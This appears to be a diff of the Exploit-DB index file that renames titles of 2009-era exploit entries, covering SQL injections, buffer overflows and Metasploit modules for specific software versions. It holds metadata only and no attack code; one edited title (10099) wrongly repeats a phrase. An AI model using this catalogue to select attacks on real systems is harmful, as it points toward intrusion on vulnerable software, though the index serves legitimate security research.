9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local,0 -9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser - (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 +9330,platforms/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 @@ -8829,7 +8829,7 @@ id,file,description,date,author,platform,type,port 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0 -9351,platforms/php/webapps/9351.txt,"Payment Processor Script - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 +9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9352,platforms/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure",2009-08-04,"Jon Oberheide",linux,local,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0 @@ -8924,7 +8924,7 @@ id,file,description,date,author,platform,type,port 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 -9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 +9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 @@ -9023,11 +9023,11 @@ id,file,description,date,author,platform,type,port 9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0 9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 -9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0 +9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 -9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 (Windows 2000 SP4) - FTP Server Remote Stack Overflow",2009-09-01,muts,windows,remote,21 +9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflows",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",asp,webapps,0 @@ -9074,7 +9074,7 @@ id,file,description,date,author,platform,type,port 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 -9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 +9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 @@ -9270,7 +9270,7 @@ id,file,description,date,author,platform,type,port 9877,platforms/asp/webapps/9877.txt,"DWebPro - Command Injection",2009-10-17,"Rafael Sousa",asp,webapps,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,"bellick ",windows,dos,7144 9880,platforms/php/webapps/9880.txt,"eNdonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 -9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 +9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0 @@ -9306,7 +9306,7 @@ id,file,description,date,author,platform,type,port 9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 +9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 @@ -9314,8 +9314,8 @@ id,file,description,date,author,platform,type,port 9926,platforms/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,php,webapps,0 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9929,platforms/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 @@ -9324,7 +9324,7 @@ id,file,description,date,author,platform,type,port 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 -9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 +9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (1)",2004-10-21,patrick,multiple,remote,0 9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 9943,platforms/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 @@ -9336,7 +9336,7 @@ id,file,description,date,author,platform,type,port 9949,platforms/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0 9950,platforms/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 -9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 +9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 @@ -9376,19 +9376,19 @@ id,file,description,date,author,platform,type,port 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 -9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 +9998,platforms/windows/remote/9998.c,"BulletProof FTP Client 2.63 b56 - Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",php,webapps,0 -10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 +10004,platforms/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 -10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 +10009,platforms/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 -10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 +10011,platforms/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0 10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 @@ -9398,7 +9398,7 @@ id,file,description,date,author,platform,type,port 10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 -10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 +10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 @@ -9466,16 +9466,16 @@ id,file,description,date,author,platform,type,port 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 -10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 +10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 -10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 +10099,platforms/windows/remote/10099.py,"Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 -10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 +10102,platforms/windows/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 @@ -9493,7 +9493,7 @@ id,file,description,date,author,platform,type,port 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 -10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 +10176,platforms/windows/dos/10176.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 @@ -9533,7 +9533,7 @@ id,file,description,date,author,platform,type,port 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0 10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 -10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 +10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 @@ -9544,7 +9544,7 @@ id,file,description,date,author,platform,type,port 10232,platforms/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 -10235,platforms/windows/remote/10235.py,"Eureka Mail Client - Remote Buffer Overflow",2009-11-26,"Dr_IDE and dookie",windows,remote,0 +10235,platforms/windows/remote/10235.py,"Eureka Email Client - Remote Buffer Overflow",2009-11-26,"Dr_IDE and dookie",windows,remote,0 10236,platforms/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Upload",2009-11-26,DigitALL,php,webapps,0 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 10238,platforms/php/webapps/10238.txt,"Joomla! Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 @@ -9612,19 +9612,19 @@ id,file,description,date,author,platform,type,port 10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 -10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0 +10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 -10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 +10324,platforms/php/webapps/10324.txt,"phpShop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"WordPress Plugin Image Manager - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos,0 10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion",2009-12-06,"cr4wl3r ",php,webapps,0 10330,platforms/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 -10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 +10332,platforms/windows/local/10332.rb,"PointDev IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC)",2009-12-06,Dr_IDE,windows,dos,0 10334,platforms/multiple/dos/10334.py,"VideoLAN VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 @@ -9677,7 +9677,7 @@ id,file,description,date,author,platform,type,port 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 -10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 +10394,platforms/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 